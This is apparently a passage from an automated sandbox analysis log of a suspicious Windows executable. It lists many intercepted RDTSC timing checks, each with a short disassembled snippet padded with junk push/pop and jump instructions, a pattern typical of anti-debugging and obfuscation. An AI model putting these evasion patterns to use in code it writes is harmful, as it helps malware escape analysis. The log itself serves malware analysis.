                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61DB1B second address: 61DB50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F593855EEECh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007F593855EEF4h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61DB50 second address: 61DB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61DB54 second address: 61DB89 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F593855EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c or dword ptr [ebp+124452B4h], eax 0x00000012 lea ebx, dword ptr [ebp+1244955Eh] 0x00000018 jmp 00007F593855EEF2h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F593855EEE8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F872 second address: 63F895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558A9Eh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jbe 00007F5938558A96h 0x00000012 jnc 00007F5938558A96h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F895 second address: 63F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6050D9 second address: 6050DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63D9AD second address: 63D9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DCCA second address: 63DCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DE18 second address: 63DE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F593855EEE6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DE27 second address: 63DE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DE2D second address: 63DE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F593855EEE6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DE3E second address: 63DE4A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5938558A96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63DE4A second address: 63DE4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E0D1 second address: 63E0D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E0D6 second address: 63E0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F593855EEEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E4DA second address: 63E4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E68A second address: 63E68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E68E second address: 63E6B1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5938558A96h 0x00000008 jmp 00007F5938558A9Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F5938558A96h 0x00000017 jnp 00007F5938558A96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E6B1 second address: 63E6D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F593855EEF9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E6D9 second address: 63E6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E6DD second address: 63E6E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E849 second address: 63E84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E84D second address: 63E869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E869 second address: 63E887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5938558AA9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E887 second address: 63E88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E88D second address: 63E893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E893 second address: 63E897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E897 second address: 63E89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 631ACD second address: 631AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63E9D8 second address: 63E9F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push esi 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007F5938558A96h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63EFCD second address: 63EFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F157 second address: 63F160 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F160 second address: 63F166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F166 second address: 63F19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5938558AA8h 0x0000000a pushad 0x0000000b jmp 00007F5938558AA4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F2E2 second address: 63F2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F2E6 second address: 63F2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F6DA second address: 63F6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F6E0 second address: 63F6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F6E4 second address: 63F6FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F593855EF1Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 63F6FC second address: 63F706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5938558A96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64268F second address: 642699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 640E20 second address: 640E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 640E25 second address: 640E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 640E2B second address: 640E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 640E2F second address: 640E46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F593855EEECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 645833 second address: 64583A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 608706 second address: 608722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEAh 0x00000007 push ecx 0x00000008 jmp 00007F593855EEEDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64A57C second address: 64A5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5938558A9Ch 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F5938558A96h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F5938558A9Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64A5A5 second address: 64A5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64AC3A second address: 64AC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B7C3 second address: 64B7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F593855EEE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B7D3 second address: 64B7E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5938558A96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B7E1 second address: 64B80D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F593855EEF6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B80D second address: 64B821 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B821 second address: 64B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B825 second address: 64B88E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558AA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5938558AA0h 0x0000000e popad 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F5938558A98h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov si, bx 0x0000002d call 00007F5938558A99h 0x00000032 jmp 00007F5938558AA5h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B88E second address: 64B8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64B8A0 second address: 64B8C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5938558AA1h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F5938558A9Ch 0x00000015 jnp 00007F5938558A96h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64BE1D second address: 64BE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64BFE3 second address: 64BFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64BFE7 second address: 64BFFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64C585 second address: 64C589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64C589 second address: 64C58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64C58D second address: 64C598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64C728 second address: 64C732 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F593855EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64CA0C second address: 64CA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64CA12 second address: 64CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64CA16 second address: 64CA5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F5938558A98h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F5938558AA4h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64CA5B second address: 64CA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64DA47 second address: 64DA55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64D884 second address: 64D888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64DA55 second address: 64DA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64D888 second address: 64D892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64DA5B second address: 64DA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64D892 second address: 64D896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64DA5F second address: 64DA72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F5938558AA4h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64DA72 second address: 64DA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64EB36 second address: 64EB9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F5938558A98h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 js 00007F5938558A96h 0x0000002d or dword ptr [ebp+124468B8h], ebx 0x00000033 mov edi, dword ptr [ebp+122D2A01h] 0x00000039 push 00000000h 0x0000003b jmp 00007F5938558AA3h 0x00000040 xchg eax, ebx 0x00000041 jnl 00007F5938558A9Ah 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a js 00007F5938558A98h 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64F6F1 second address: 64F718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F593855EEECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 64F718 second address: 64F71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 650CC9 second address: 650CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65184A second address: 65184F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 65184F second address: 651864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 651864 second address: 651868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6532D5 second address: 6532D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 6532D9 second address: 6532F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5938558A9Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 610BB9 second address: 610BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 610BBF second address: 610BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 653986 second address: 65398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
